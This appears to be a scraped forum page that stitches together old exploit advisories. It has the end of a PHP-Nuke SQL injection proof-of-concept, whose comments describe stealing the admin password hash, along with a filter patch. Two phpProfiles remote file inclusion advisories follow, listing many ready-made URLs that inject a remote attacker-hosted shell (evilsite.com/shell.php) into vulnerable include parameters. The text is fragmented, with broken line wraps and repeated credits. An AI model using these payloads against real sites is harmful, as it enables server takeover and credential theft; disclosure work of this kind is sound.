// Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table. // - How to fix it? More information? // // You can found a patch on http://www.neosecurityteam.net/foro/ // Also, you can modify the line 143 of mainfile.php, adding one more protection like: // ==[ mainfile.php old line (143) ]========================== // [ ] // if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) { // } // [ ] // ==[ end mainfile.php ]===================================== // ==[ mainfile.php new line (143) ]========================== // [ ] // if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+') OR stripos_clone($postString_64, // '*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) { // } // [ ] // ==[ end mainfile.php ]===================================== // That's a momentary solution to the problem. I recommend to download the PHP Nuke 8.0 version in the next days it is not // free at the moment. // - References // // http://www.neosecurityteam.net/index.php?action=advisories&id=27 // - Credits // // Anti SQL Injection protection bypass by Paisterist -> paisterist.nst [at] gmail [dot] com // SQL Injection vulnerability in Encyclopedia module discovered by Paisterist -> paisterist.nst [at] gmail [dot] com // Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com // [N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/ // - Greets // // HaCkZaTaN // K4P0 // Daemon21 // Link // 0m3gA_x // LINUX // nitrous // m0rpheus // nikyt0x // KingMetal // Knightmare // Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS! ?> Black_hat_cr(HCE) phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities PHP Code: #====================================================== ============ # phpProfiles (RFI) #====================================================== ============ # Info:- # # Scripts: phpProfiles # download : http://sourceforge.net/project/showfiles.php?group_id=176310 # Version : v.2.1 Beta # Dork & vuln : download scripts and think :) # #====================================================== ============ #Exploit : # #http://localhost/path/users/include/body.inc.php?reqpath=http://EvElCoDe.t xt? #http://localhost/path/users/include/body_blog.inc.php?reqpath=http://EvElC oDe.txt? #http://localhost/path/users/include/upload_ht.inc.php?usrinc=http://EvElCoD e.txt? # #====================================================== ============ #Discoverd By : v1per-haCker # #Conatact : v1per-hacker[at]hotmail.com # #XP10_hackEr Team >> www.xp10.com #SpeciaL PoweR SecuritY TeaM >> www.specialpower.org # #Greetz to : | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL | # | ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net | # | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota | # | Jean | CoDeR | # # Thanks >> /str0ke & www.milw0rm.com & www.google.com ======================================================= ============ # milw0rm.com [2006-10-30] sexyvirus(HCE) phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities Code: + + phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities + + Affected Software .: phpProfiles <= 3.1.2b + Download : http://downloads.sourceforge.net/phpprofiles/phpProfiles_3_1_2.zip + Description : "phpProfiles allows you to offer visitors their very own URL on your web site simply by registering" + Class : Remote File Inclusion + Risk : High (Remote File Execution) + Found By : nuffsaid <nuffsaid[at]newbslove.us> + + Details: + phpProfiles has several scripts which do not initialize variables before using them to + include files, assuming register_globals = on, we can initialize any one of the variables + in a query string and include a remote file of our choice. + + Vulnerable Code: + include/remove_pic.inc.php line(s) 11: include("$scriptpath/redirect.php"); + include/body_admin.inc.php line(s) 03: <p><?include("$menu");?></p> + include/account.inc.php, line(s) 09: include("$incpath/footer.inc.php"); + include/index.inc.php, line(s) 05: include("$incpath/adminerr.inc.php"); + see below for a list of files affected. + + Proof Of Concept: + http://[target]/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php + http://[target]/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php? + http://[target]/[path]/include/account.inc.php?action=update&incpath=http://evilsit e.com/shell.php? + http://[target]/[path]/include/admin_newcomm.inc.php?action=create&incpath=htt p://evilsite.com/shell.php? + http://[target]/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/she ll.php? + http://[target]/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php? + http://[target]/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite. com/shell.php? + http://[target]/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php ? + http://[target]/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.c om/shell.php? + http://[target]/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php? + http://[target]/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.p hp + http://[target]/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell. php? + http://[target]/[path]/include/commrecc.inc.php?action=recommend&incpath=http: //evilsite.com/shell.php? + http://[target]/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php? + http://[target]/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsi te.com/shell.php? + http://[target]/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php ? . #====================================================== ============ #Discoverd By : v1per -haCker # #Conatact : v1per -hacker[ at]hotmail.com # #XP10 _hackEr Team >> www.xp10.com #SpeciaL PoweR SecuritY TeaM >>